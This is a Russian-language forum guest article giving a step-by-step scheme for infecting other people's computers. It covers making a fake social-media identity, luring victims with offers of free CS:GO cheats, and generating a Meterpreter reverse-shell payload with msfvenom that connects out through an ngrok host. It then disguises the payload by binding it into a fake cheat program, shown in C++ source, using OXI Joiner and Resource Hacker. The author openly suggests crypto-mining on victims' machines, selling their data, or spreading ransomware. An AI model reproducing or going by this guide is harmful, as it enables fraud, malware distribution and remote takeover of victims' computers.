• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Гостевая статья Методика темного взлома

  • Автор темы to_0day
  • Дата начала
1580379162483.png


Кто только не слышал о его неудачном приключении. Я сейчас не о животных говорю, а о мошеннике с именем Енот Погромист. О его карьере слышал каждый. Особенно это можно было услышать в новостях 2018 года с запросом: " ". И так, перейдем к сути. В данном цикле статей я бы хотел показать аналогичную схему по которой можно получать доступ к чужим компам. Можете майнить на них крипту или же продавать данные, но помните что все это исключительно ради ознакомления.

Введение

И так, прежде чем начать давайте я введу вас в курс дела, а точнее, что мы будем делать и что нам потребуется для этого.

Как мы все знаем Енот зарабатывал сливая некие "читы" для игр. Но мы расширим границы обычного и будем создавать не свои вирусы (под видом читов), а попробуем использовать то, что есть под рукой. Для начала нам потребуется:


  1. Аккаунт на и деньги на нем
  2. Виртуальная машина с Kali Linux (2019.4)
  3. Регистрация на сайте
  4. OXI Joiner
  5. Resource Hacker
Работа будет анонимна по максимум, чтобы не сесть на бутылку. Советую начать скачивать то чего у вас нет, чтобы в дальнейшем не было проблем. Мы переходим к началу.

Основа для работы

Для начала давайте создадим фальшивую личность с которой будет идти вся работа. Переходим и генерируем подходящего нам человека. Вот пример:

1580378783137.png


Фамилия Имя Отчество: Журавлёв Станислав Аркадьевич

Дата рождения: 22 ноября 1978 года

Адрес: 433581, г. Назрань, ул. Новые Сады 2-я, дом 27, квартира 110

Номер телефона: 8 (936) 840-80-70

Любимый цвет: Фиолетовый

Логин: JuravlevStanislav39

Пароль: jMJH0A3fBofJ



Там же ниже есть кнопка . Редактируем ее под себя. В название можете поставить логин от своего человека (пример: JuravlevStanislav39). После данных манипуляций переходим на данный . Входим в свой аккаунт (на нем должно быть не менее 40 рублей) и заказываем номер для любой подходящей вам социальной сети. Я советую ВКонтакте так как там результаты будут буквально через 3 дня. Номер для данного сервиса без выбора страны стоит 10 рублей.

После создания советую закрыть профиль и начать редакцию добавив фотографию и посты. После начинайте рассылку по разным группам в комментариях примерно такой текст:

Сливаю платные читы для игр, писать в лс
А дальше ждем наших мамонтов, которые смогут на это пойти. Но прежде создадим вирус через Kali Linux.

Полезная нагрузка

Для этого скачиваем и разархивируем ngrok . Перед этим вы должны зарегистрироваться на данном сайте. После вас перебросят на страницу где в команде будет указан ваш токен. Теперь открываем терминал и вводим команду:
./ngrok authtoken ваш токен
Теперь нам требуется связаться с внешним миром, а для этого пишем:
1580378800834.png


Дальше нам потребуется создание полезной нагрузки. А точнее нашего вируса для дальнейшей работы с ним. Для этого пишем:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18961 R > payload.exe
Порт берете из Ngrok. Он указан в Forwarding как выше на скрине. Дальше мы видим приблизительно это:

1580378908443.png


Далее мы рассмотрим способы скрытия готового вируса под программы и попробуем написать такую саму. Нам потребуется:

  1. Visual Studio
  2. OXI Joiner
  3. Resource Hacker
И так, давайте создадим программу якобы читы для великой игры CS:GO. Так как она самая распространенная я напишу простенькую программу, которая будет делать имитацию взлома в игре. Только поймут, что это обман люди минут через 15 после начала игры. Надеюсь за это время вы успеете все сделать. Да, хотелось обговорить еще один момент. Вирус работает на машине под управлением Windows 7. На 10 был проведен тест и требуются дополнительные файлы для работы программы.

Открываем нашу IDE и создаем Консольное Приложение на C++. Потом вставляем туда данный код:

C++:
    #include <iostream>

    #include <fstream>


    using namespace std;


    int main()

    {

       setlocale(LC_ALL, "Russian");

       string ra, login, pass, rpass, rlogin, clogin, cpass;

       cout << "Добрый день, вас приветствует Панель Читов для CS:GO.\nВыберете действие..." << endl << "Регистрация/Авторизация (r/a): ";

       cin >> ra;

       if (ra == "r")

       {

          cout << "Логин: ";

          cin >> rlogin;

          cout << "Пароль: ";

          cin >> rpass;

          ofstream flogin("login.txt");

          flogin << rlogin;

          flogin.close();

          ofstream fpass("pass.txt");

          fpass << rpass;

          fpass.close();

       };

       if (ra == "a")

       {

          cout << "...чтение..." << endl;

          ifstream flogin("login.txt");

          ifstream fpass("pass.txt");

          while (!flogin.eof() & !fpass.eof())

          {

             flogin >> clogin;

             fpass >> cpass;

          };

          cout << "Логин: ";

          cin >> login;

          cout << "Пароль: ";

          cin >> pass;

          fpass.close();

          flogin.close();

          if (login == clogin & pass == cpass)

          {

             cout << "Вход выполнен успешно!" << endl;

          }

          else if (login != clogin)

          {

             cerr << "Ошибка: неправильный логин" << endl;

             system("pause");

          }

          else if (pass != cpass)

          {

             cerr << "Ошибка: неправильный пароль" << endl;

             system("pause");

          };

       };

       if (ra != "a" & ra != "r")

       {

          cerr << "Критическая Ошибка: данные не обнаружены!" << endl;

          system("pause");

       };

       system("pause");


       int a, b, c;


       for (b = 1; b <= 5; b++) {

          cout << "Введите вашу функцию:" << endl;

          cin >> a;

          switch (a) {

          case 1:

             cout << "Загрузка... команда успешно запущена!" << endl;

             break;

          case 2:

             cout << "Загрузка... команда успешно запущена!" << endl;

             break;

          case 3:

             cout << "Загрузка... команда успешно запущена!" << endl;

             break;

          case 4:

             cout << "Загрузка... команда успешно запущена!" << endl;

             break;

          case 5:

             cout << "Загрузка... команда успешно запущена!" << endl;

             break;

          case 0:

             cout << "Справочник команд:\n 1 - включть самонаводку;\n 2 - бессмертие;\n 3 - просмотр сковзь стены;\n 4 - бесплатные покупки;\n 5 - патроны без ограничений;\n" << endl;

             break;


          default:

             cout << "Введено неверное значение" << endl;

             cout << "CRITICAL ERROR: Program activation failed!" << endl;


          }

       }


       return 0;

    }

Кому как, а меня победила лень и на большее я писать не стал) Далее мы берем нашу программу и через Resource Hacker пропускаем.

1580378985258.png


Теперь скачаем иконку программы. Для этого выбираем формат .ico и после загрузки кидаем ее в программу (закиньте прогу в Resource Hacker перед этим). Далее добавляем описание, которое будет высвечиваться при наведение на программу. Перед этим сохраните вашу программу, чтобы изменить его иконку. Теперь берем любой файл и кидаем его в программу. Находим папку Version Info. Нажимаем на файл и дальше сохраняем его в файл .res. Для этого переходим во вкладку Action и выбираем Add from Resource. После сохраненный файл кидаем в наш вирус. И меняем его содержимое на нужное.

Запускаем OXI Joiner и редачим наш файл под себя, точнее чтобы он был как можно скрытый для пользователя. Это можно сделать в свойствах нашего файла.

1580378996873.png


После билдим ее и распространяем. А это уже зависит от вас самих.


Вывод

В данной статье я открыл вам одну из схем работ мошенников и хакеров. На самом деле алгоритмы просты, но как их использовать уже другое дело. Так же рекомендуется очень хорошо задуматься над распространением вашего софта. А дальше дело фантазии. Вы можете таким способов скрыть вирус вымогатель или майнер все что вам придет в голову.

Источник
 
Последнее редактирование модератором:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!